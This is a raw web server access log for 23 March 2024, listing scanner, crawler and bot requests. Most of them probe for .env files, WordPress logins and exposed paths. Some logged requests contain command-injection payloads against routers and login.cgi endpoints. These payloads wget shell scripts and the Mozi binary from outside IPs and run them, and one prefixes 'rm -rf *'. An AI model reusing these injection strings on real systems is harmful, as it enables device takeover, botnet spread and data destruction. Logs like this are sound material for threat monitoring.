185.224.128.43 - - [23/Mar/2024:01:06:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 198.235.24.253 - - [23/Mar/2024:01:23:12 +0100] "\x16\x03\x01" 400 383 "-" "-" 198.235.24.253 - - [23/Mar/2024:01:23:12 +0100] "\x16\x03\x01" 400 383 "-" "-" 146.190.50.175 - - [23/Mar/2024:01:36:17 +0100] "GET /SMS_DP_SMSPKG$/Datalib HTTP/1.0" 404 377 "-" "Microsoft+BITS/7.8" 80.82.78.39 - - [23/Mar/2024:02:02:07 +0100] "GET /.sqlmap HTTP/1.1" 404 352 "-" "Mozilla/5.0" 80.82.78.39 - - [23/Mar/2024:02:02:10 +0100] "\x16\x03\x01" 400 383 "-" "-" 87.121.69.52 - - [23/Mar/2024:02:05:55 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 146.19.24.28 - - [23/Mar/2024:02:14:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 114.119.148.184 - - [23/Mar/2024:02:16:58 +0100] "GET /wp-content/uploads/2016/12/ziv.png HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" 198.235.24.170 - - [23/Mar/2024:02:17:11 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 35.203.210.168 - - [23/Mar/2024:02:43:58 +0100] "GET /client/get_targets HTTP/1.1" 404 363 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 194.154.79.122 - - [23/Mar/2024:02:53:13 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 37.115.216.33 - - [23/Mar/2024:02:57:47 +0100] "GET /%7Eridersde/joomla/index.php?option=com_Kunena HTTP/1.0" 404 386 "http://coffeenostra.castlegem.co.uk/%7Eridersde/joomla/index.php?option=com_Kunena" "Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1" 37.115.216.33 - - [23/Mar/2024:02:57:47 +0100] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 7.1; Win64; rv:43.1) Gecko/20100101 Firefox/43.1" 71.6.134.231 - - [23/Mar/2024:02:59:11 +0100] "\x16\x03\x01" 400 383 "-" "-" 71.6.134.231 - - [23/Mar/2024:03:11:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 71.6.134.231 - - [23/Mar/2024:03:12:43 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" 2.57.149.92 - - [23/Mar/2024:03:24:02 +0100] "\x03" 400 383 "-" "-" 146.19.24.28 - - [23/Mar/2024:03:25:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 37.115.216.33 - - [23/Mar/2024:03:27:15 +0100] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:37.1) Gecko/20100101 Firefox/37.1" 91.92.250.119 - - [23/Mar/2024:03:50:41 +0100] "POST /login HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 146.19.24.28 - - [23/Mar/2024:04:23:06 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 194.120.230.94 - - [23/Mar/2024:05:02:39 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 185.253.162.26 - - [23/Mar/2024:05:22:54 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 146.19.24.28 - - [23/Mar/2024:05:35:36 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 47.128.43.204 - - [23/Mar/2024:05:38:29 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 149.28.132.162 - - [23/Mar/2024:05:39:15 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1319.1272 Mobile Safari/537.36" 185.224.128.43 - - [23/Mar/2024:05:51:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 194.120.230.94 - - [23/Mar/2024:05:51:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 146.19.24.28 - - [23/Mar/2024:06:20:34 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 101.44.251.228 - - [23/Mar/2024:06:43:19 +0100] "GET /index.php?sid=3c8c8f7fbe9de5c9225d33524e630c93 HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=3c8c8f7fbe9de5c9225d33524e630c93" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 167.172.39.21 - - [23/Mar/2024:07:06:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:54 +0100] "\x16\x03\x01" 400 383 "-" "-" 139.59.92.64 - - [23/Mar/2024:07:15:54 +0100] "\x16\x03\x01" 400 383 "-" "-" 139.59.92.64 - - [23/Mar/2024:07:15:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:55 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2" 139.59.92.64 - - [23/Mar/2024:07:15:55 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 139.59.92.64 - - [23/Mar/2024:07:15:55 +0100] "\x16\x03\x01" 400 383 "-" "-" 139.59.92.64 - - [23/Mar/2024:07:15:56 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:56 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:56 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:57 +0100] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:57 +0100] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:57 +0100] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:58 +0100] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 139.59.92.64 - - [23/Mar/2024:07:15:58 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 23.224.198.111 - - [23/Mar/2024:07:16:21 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "hacked-by-matrix" 146.19.24.28 - - [23/Mar/2024:07:18:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 205.210.31.77 - - [23/Mar/2024:07:49:47 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 87.121.69.52 - - [23/Mar/2024:08:00:55 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 164.52.0.94 - - [23/Mar/2024:08:45:13 +0100] "\x16\x03\x01\x02" 400 383 "-" "-" 164.52.0.94 - - [23/Mar/2024:08:45:43 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 164.52.0.94 - - [23/Mar/2024:08:46:21 +0100] "GET /layout.php%22%2C%20%22_blank%22%2C%20%22resizable%3Dyes%2C%20scrollbars%3Dno%2C%20outerwidth%3D1024%2C%20outerheight%3D734 HTTP/1.1" 404 451 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 164.52.0.94 - - [23/Mar/2024:08:47:08 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 164.52.0.94 - - [23/Mar/2024:08:47:36 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 34.76.158.233 - - [23/Mar/2024:08:56:50 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0" 222.219.130.168 - - [23/Mar/2024:08:57:40 +0100] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 23.90.165.142 - - [23/Mar/2024:09:16:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 120.86.253.202 - - [23/Mar/2024:09:27:54 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 286 "-" "Hello, World" 77.94.124.174 - - [23/Mar/2024:09:35:15 +0100] "GET /wp-content/plugins/gotmls/readme.txt HTTP/1.1" 404 392 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 140.228.24.228 - - [23/Mar/2024:09:41:39 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" 3.92.45.132 - - [23/Mar/2024:10:12:38 +0100] "\x16\x03\x01" 400 383 "-" "-" 3.92.45.132 - - [23/Mar/2024:10:12:38 +0100] "\x16\x03\x01" 400 383 "-" "-" 194.120.230.94 - - [23/Mar/2024:10:19:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 35.203.211.174 - - [23/Mar/2024:10:39:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 80.94.92.60 - - [23/Mar/2024:10:42:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 146.19.24.28 - - [23/Mar/2024:11:13:40 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 185.224.128.43 - - [23/Mar/2024:11:23:38 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 198.235.24.185 - - [23/Mar/2024:11:32:49 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 23.224.198.111 - - [23/Mar/2024:11:34:48 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "hacked-by-matrix" 185.191.126.213 - - [23/Mar/2024:11:49:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 146.19.24.28 - - [23/Mar/2024:12:20:27 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 74.82.47.4 - - [23/Mar/2024:12:25:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 74.82.47.4 - - [23/Mar/2024:12:28:59 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0" 74.82.47.4 - - [23/Mar/2024:12:30:04 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 185.150.189.121 - - [23/Mar/2024:12:35:26 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A4449d Safari/9537.53" 162.216.150.227 - - [23/Mar/2024:12:36:54 +0100] "GET /client/get_targets HTTP/1.1" 404 363 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 146.19.24.28 - - [23/Mar/2024:13:01:09 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 185.186.78.160 - - [23/Mar/2024:13:01:12 +0100] "GET /%7Eridersde/joomla/index.php HTTP/1.0" 404 386 "http://coffeenostra.castlegem.co.uk/%7Eridersde/joomla/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Iron Safari/537.36" 185.186.78.160 - - [23/Mar/2024:13:01:12 +0100] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Iron Safari/537.36" 199.102.184.222 - - [23/Mar/2024:13:29:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 205.210.31.172 - - [23/Mar/2024:13:47:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 87.121.69.52 - - [23/Mar/2024:13:57:23 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 146.19.24.28 - - [23/Mar/2024:14:08:53 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 80.66.88.211 - - [23/Mar/2024:14:10:14 +0100] "\x03" 400 383 "-" "-" 43.247.161.235 - - [23/Mar/2024:14:34:42 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 114.119.154.186 - - [23/Mar/2024:15:24:11 +0100] "GET /wp-content/uploads/2016/05/DrVerenaSchager.png HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" 184.105.139.69 - - [23/Mar/2024:15:25:48 +0100] "\x16\x03\x01" 400 383 "-" "-" 80.82.78.39 - - [23/Mar/2024:15:26:19 +0100] "GET /.ghauri HTTP/1.1" 404 352 "-" "Mozilla/5.0" 80.82.78.39 - - [23/Mar/2024:15:26:22 +0100] "\x16\x03\x01" 400 383 "-" "-" 78.153.140.179 - - [23/Mar/2024:15:37:43 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.179 - - [23/Mar/2024:15:37:43 +0100] "\x16\x03\x01" 400 383 "-" "-" 185.150.26.251 - - [23/Mar/2024:16:05:25 +0100] "GET http://httpbin.org/ip HTTP/1.1" 404 278 "-" "Go-http-client/1.1" 185.224.128.43 - - [23/Mar/2024:16:06:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 64.23.171.138 - - [23/Mar/2024:16:07:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 107.148.95.123 - - [23/Mar/2024:16:20:03 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "hacked-by-matrix" 173.249.0.2 - - [23/Mar/2024:16:23:33 +0100] "GET /wp-login.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 146.19.24.28 - - [23/Mar/2024:16:25:21 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 161.97.160.202 - - [23/Mar/2024:16:30:00 +0100] "GET /wp-content/plugins/gotmls/readme.txt HTTP/1.1" 404 392 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/62.0" 146.19.24.28 - - [23/Mar/2024:17:24:05 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 162.216.150.59 - - [23/Mar/2024:17:33:19 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 103.246.30.200 - - [23/Mar/2024:17:47:52 +0100] "GET /.git/HEAD HTTP/1.1" 404 350 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0" 146.19.24.28 - - [23/Mar/2024:18:09:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 192.155.88.231 - - [23/Mar/2024:18:20:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 172.104.11.34 - - [23/Mar/2024:18:20:29 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.79.181.104 - - [23/Mar/2024:18:21:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.104.11.51 - - [23/Mar/2024:18:21:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 45.79.181.104 - - [23/Mar/2024:18:21:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.104.11.4 - - [23/Mar/2024:18:22:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 80.94.92.60 - - [23/Mar/2024:18:25:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 101.44.249.94 - - [23/Mar/2024:18:35:27 +0100] "GET /robots.txt HTTP/1.1" 404 292 "http://triadian.castlegem.co.uk/robots.txt" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 47.128.57.27 - - [23/Mar/2024:18:42:09 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 139.180.143.119 - - [23/Mar/2024:18:43:11 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.8447.1469 Mobile Safari/537.36" 107.170.243.32 - - [23/Mar/2024:19:20:03 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 196.51.114.128 - - [23/Mar/2024:19:46:30 +0100] "\x16\x03\x01" 400 383 "-" "-" 196.51.114.128 - - [23/Mar/2024:19:46:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.172.187.115 - - [23/Mar/2024:19:50:40 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 201.49.250.254 - - [23/Mar/2024:19:50:59 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 114.119.155.10 - - [23/Mar/2024:20:05:16 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" 51.81.216.81 - - [23/Mar/2024:20:06:02 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 51.81.216.81 - - [23/Mar/2024:20:06:03 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 87.121.69.52 - - [23/Mar/2024:20:17:01 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 198.235.24.35 - - [23/Mar/2024:20:29:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 146.19.24.28 - - [23/Mar/2024:21:03:29 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 80.94.92.60 - - [23/Mar/2024:21:16:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 80.94.92.60 - - [23/Mar/2024:21:19:10 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" 101.44.249.250 - - [23/Mar/2024:21:32:51 +0100] "GET /index.php?sid=5551d517ccd54c608b5000a54ac25b2a HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=5551d517ccd54c608b5000a54ac25b2a" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 185.224.128.43 - - [23/Mar/2024:21:53:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 117.248.17.4 - - [23/Mar/2024:22:09:08 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.248.17.4:55088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-" 198.235.24.198 - - [23/Mar/2024:22:18:01 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.122 - - [23/Mar/2024:23:17:50 +0100] "\x16\x03\x01" 400 383 "-" "-" 198.235.24.122 - - [23/Mar/2024:23:17:50 +0100] "\x16\x03\x01" 400 383 "-" "-" 146.19.24.28 - - [23/Mar/2024:23:19:17 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 101.44.251.200 - - [23/Mar/2024:23:22:29 +0100] "GET /gallery/search.php?search_id=recent&sid=b7e0303a92d6d282d782a44dd171c2a1 HTTP/1.1" 404 298 "http://triadian.castlegem.co.uk/gallery/search.php?search_id=recent&sid=b7e0303a92d6d282d782a44dd171c2a1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 107.180.109.11 - - [23/Mar/2024:23:29:03 +0100] "GET /wp-content/plugins/wp-automatic/css/style.css HTTP/1.1" 404 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" 142.171.26.222 - - [23/Mar/2024:23:35:49 +0100] "GET /wp-content/plugins/wp-automatic/css/style.css HTTP/1.1" 404 397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1" 45.83.66.153 - - [23/Mar/2024:23:49:22 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 45.83.66.25 - - 